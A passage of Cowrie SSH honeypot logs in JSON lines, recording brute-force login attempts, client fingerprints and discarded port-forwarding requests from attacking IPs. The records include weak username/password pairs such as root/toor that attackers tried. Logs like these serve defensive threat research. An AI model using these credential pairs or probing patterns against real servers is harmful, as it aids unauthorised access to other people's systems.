fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:14.273895Z","src_ip":"212.227.235.229","session":"1bbf0b55d3a4"}
{"eventid":"cowrie.session.closed","duration":"19.4","message":"Connection lost after 19.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:14.384939Z","src_ip":"212.227.235.229","session":"2f6f3af5b5d1"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd01","message":"login attempt [root/P@ssw0rd01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:07:15.296743Z","src_ip":"212.227.235.229","session":"14f8547c2265"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:15.994790Z","src_ip":"212.227.235.229","session":"14f8547c2265"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52556,"dst_ip":"1.2.3.4","dst_port":22,"session":"7678ad0e4bb5","protocol":"ssh","message":"New connection: 212.227.235.229:52556 (1.2.3.4:22) [session: 7678ad0e4bb5]","sensor":"my-vps","timestamp":"2025-08-26T21:07:16.219587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:16.246319Z","src_ip":"212.227.235.229","session":"7678ad0e4bb5"}
{"eventid":"cowrie.login.success","username":"root","password":"temp","message":"login attempt [root/temp] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:07:16.320836Z","src_ip":"212.227.235.229","session":"1bbf0b55d3a4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:16.607878Z","src_ip":"212.227.235.229","session":"7678ad0e4bb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:07:16.610047Z","session":"1bbf0b55d3a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:07:16.938941Z","src_ip":"212.227.235.229","session":"1bbf0b55d3a4"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:17.212388Z","src_ip":"212.227.235.229","session":"1bbf0b55d3a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34780,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2d495e3f036","protocol":"ssh","message":"New connection: 212.227.235.229:34780 (1.2.3.4:22) [session: a2d495e3f036]","sensor":"my-vps","timestamp":"2025-08-26T21:07:17.971956Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abc123","message":"login attempt [admin/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:18.698066Z","src_ip":"212.227.235.229","session":"7678ad0e4bb5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:19.003053Z","src_ip":"212.227.235.229","session":"a2d495e3f036"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:19.965892Z","src_ip":"212.227.235.229","session":"7678ad0e4bb5"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:20.956163Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:22.059780Z","src_ip":"212.227.235.229","session":"a2d495e3f036"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:30.797555Z","src_ip":"212.227.235.229","session":"a2d495e3f036"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43872,"dst_ip":"1.2.3.4","dst_port":22,"session":"326c032c07ea","protocol":"ssh","message":"New connection: 212.227.235.229:43872 (1.2.3.4:22) [session: 326c032c07ea]","sensor":"my-vps","timestamp":"2025-08-26T21:07:31.395253Z"}
{"eventid":"cowrie.session.closed","duration":"14.1","message":"Connection lost after 14.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:32.069423Z","src_ip":"212.227.235.229","session":"a2d495e3f036"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:32.100420Z","src_ip":"212.227.235.229","session":"326c032c07ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43882,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e77eade136a","protocol":"ssh","message":"New connection: 212.227.235.229:43882 (1.2.3.4:22) [session: 3e77eade136a]","sensor":"my-vps","timestamp":"2025-08-26T21:07:32.210257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:32.215541Z","src_ip":"212.227.235.229","session":"3e77eade136a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:32.358598Z","src_ip":"212.227.235.229","session":"326c032c07ea"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:32.530029Z","src_ip":"212.227.235.229","session":"3e77eade136a"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:07:34.911405Z","src_ip":"212.227.235.229","session":"326c032c07ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:07:35.207083Z","session":"326c032c07ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:07:35.462845Z","src_ip":"212.227.235.229","session":"326c032c07ea"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:35.719382Z","src_ip":"212.227.235.229","session":"326c032c07ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43898,"dst_ip":"1.2.3.4","dst_port":22,"session":"005627607302","protocol":"ssh","message":"New connection: 212.227.235.229:43898 (1.2.3.4:22) [session: 005627607302]","sensor":"my-vps","timestamp":"2025-08-26T21:07:36.603669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:36.968343Z","src_ip":"212.227.235.229","session":"005627607302"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:37.015759Z","src_ip":"212.227.235.229","session":"005627607302"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:38.238418Z","src_ip":"212.227.235.229","session":"3e77eade136a"}
{"eventid":"cowrie.login.failed","username":"kim","password":"kim123","message":"login attempt [kim/kim123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:39.028536Z","src_ip":"212.227.235.229","session":"005627607302"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:39.512704Z","src_ip":"212.227.235.229","session":"3e77eade136a"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:40.387957Z","src_ip":"212.227.235.229","session":"005627607302"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50304,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8ff1121ecd1","protocol":"ssh","message":"New connection: 212.227.235.229:50304 (1.2.3.4:22) [session: a8ff1121ecd1]","sensor":"my-vps","timestamp":"2025-08-26T21:07:41.302901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:41.303999Z","src_ip":"212.227.235.229","session":"a8ff1121ecd1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ss